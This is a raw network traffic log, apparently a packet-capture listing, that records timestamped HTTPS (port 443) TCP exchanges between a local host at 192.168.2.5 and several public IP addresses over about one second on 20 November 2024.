                                                                                                                                                                                              Nov 20, 2024 21:28:16.885571957 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.885787010 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.885787010 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.958072901 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.958475113 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.958515882 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.959043980 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.959537029 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.959537029 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:16.959578991 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.959677935 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:16.993860006 CET49719443192.168.2.513.107.246.63
                                                                                                                                                                                              Nov 20, 2024 21:28:16.993884087 CET4434971913.107.246.63192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.009632111 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.103091955 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.103246927 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.103375912 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.103463888 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.103559971 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.103661060 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.103661060 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.103729010 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.104017973 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.114662886 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.143052101 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.143219948 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.143250942 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.195053101 CET49720443192.168.2.513.227.8.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.195075035 CET4434972013.227.8.5192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.195210934 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.223258972 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.229043961 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.229505062 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.229536057 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.231182098 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.231602907 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.231635094 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.232080936 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.232645988 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.232645988 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.232747078 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.273112059 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.273112059 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.294415951 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.299177885 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.299377918 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.299441099 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.306657076 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.307215929 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.307235956 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.316191912 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.316303015 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.317327023 CET49725443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.317356110 CET44349725141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.321027994 CET49737443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.321041107 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.321078062 CET44349737141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.321141958 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.321157932 CET49737443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.321305990 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.321551085 CET49737443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.321559906 CET49738443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.321566105 CET44349737141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.321598053 CET44349738141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.381455898 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.381781101 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.381844997 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.383554935 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.383836031 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.384277105 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.384366989 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.384432077 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.422144890 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.422226906 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.422281981 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.422338009 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.422379971 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.422415972 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.422442913 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.422576904 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.422585011 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.430155993 CET44349728104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.430526018 CET49728443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.430560112 CET44349728104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.431133032 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.432003021 CET44349728104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.432068110 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.432107925 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.432111025 CET49728443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.432127953 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.432136059 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.433105946 CET49728443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.433186054 CET44349728104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.476300955 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.476303101 CET49728443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.476316929 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.476319075 CET44349728104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.476438999 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.524029970 CET49728443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.524030924 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.543175936 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.580358028 CET443497302.16.229.162192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.580502033 CET49730443192.168.2.52.16.229.162
                                                                                                                                                                                              Nov 20, 2024 21:28:17.583348989 CET49730443192.168.2.52.16.229.162
                                                                                                                                                                                              Nov 20, 2024 21:28:17.583362103 CET443497302.16.229.162192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.583676100 CET443497302.16.229.162192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.587933064 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.587954044 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.626168966 CET49730443192.168.2.52.16.229.162
                                                                                                                                                                                              Nov 20, 2024 21:28:17.627306938 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.627378941 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.627571106 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.627604961 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.627743006 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.635304928 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.643250942 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.643358946 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.643537998 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.643548965 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.643632889 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.651443005 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.659744978 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.659802914 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.659812927 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.667339087 CET443497302.16.229.162192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.667946100 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.668036938 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.668045998 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.675649881 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.675709009 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.675723076 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.683871031 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.683923960 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.683938980 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.697628021 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.697676897 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.697685957 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.704808950 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.704849958 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.704871893 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.704889059 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.704931021 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.710094929 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.710228920 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.710310936 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.710323095 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.710378885 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.710439920 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.710458994 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.710566998 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.710621119 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.710635900 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.711858988 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.717662096 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.717731953 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.717746973 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.758264065 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.758285046 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.758559942 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.758620024 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.807985067 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.807988882 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.824920893 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.827126026 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.827176094 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.827193022 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.830040932 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.832505941 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.832571983 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.832581043 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.837199926 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.837254047 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.837266922 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.843156099 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.843215942 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.843260050 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.843282938 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.843305111 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.843373060 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.843413115 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.843447924 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.843499899 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.843516111 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.846483946 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.846544027 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.846556902 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.846605062 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.855616093 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.855628014 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.855675936 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.858655930 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.858716011 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.858731985 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.864720106 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.864732027 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.864792109 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.864801884 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.867027998 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.867244959 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.867357016 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.874016047 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.874078989 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.874099016 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.874159098 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.878810883 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.878820896 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.878881931 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.883255959 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.883336067 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.887902021 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.887912035 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.887967110 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.896807909 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.896820068 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.896863937 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.905930996 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.906004906 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.910595894 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.910657883 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.912724972 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.912801981 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.912831068 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.912863016 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.912919998 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.914726019 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:17.917474985 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.917531967 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.920926094 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.926640034 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.926718950 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.926744938 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.926806927 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.926808119 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.926861048 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.928777933 CET49726443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.928816080 CET44349726141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.929158926 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.929212093 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.929241896 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.937329054 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.937401056 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.937411070 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.945374966 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.945672035 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.945682049 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.953633070 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.953708887 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.953722954 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.962984085 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.970072985 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.970164061 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.970220089 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.970302105 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.970402956 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.977596998 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.985532045 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.985625029 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.985630035 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.985692024 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:17.985784054 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:17.993208885 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.000834942 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.000911951 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.000929117 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.001116991 CET44349727141.193.213.10192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.001218081 CET49727443192.168.2.5141.193.213.10
                                                                                                                                                                                              Nov 20, 2024 21:28:18.019088984 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:18.044754982 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.048325062 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.048418045 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.048505068 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:18.048569918 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.048649073 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:18.056278944 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.063776016 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.063884020 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:18.063947916 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.071774006 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.071861982 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:18.071893930 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.079513073 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.079586029 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:18.079605103 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.087127924 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.087218046 CET49729443192.168.2.5104.18.10.207
                                                                                                                                                                                              Nov 20, 2024 21:28:18.087232113 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.094894886 CET44349729104.18.10.207192.168.2.5
                                                                                                                                                                                              Nov 20, 2024 21:28:18.095124006 CET49729443192.168.2.5104.18.10.207
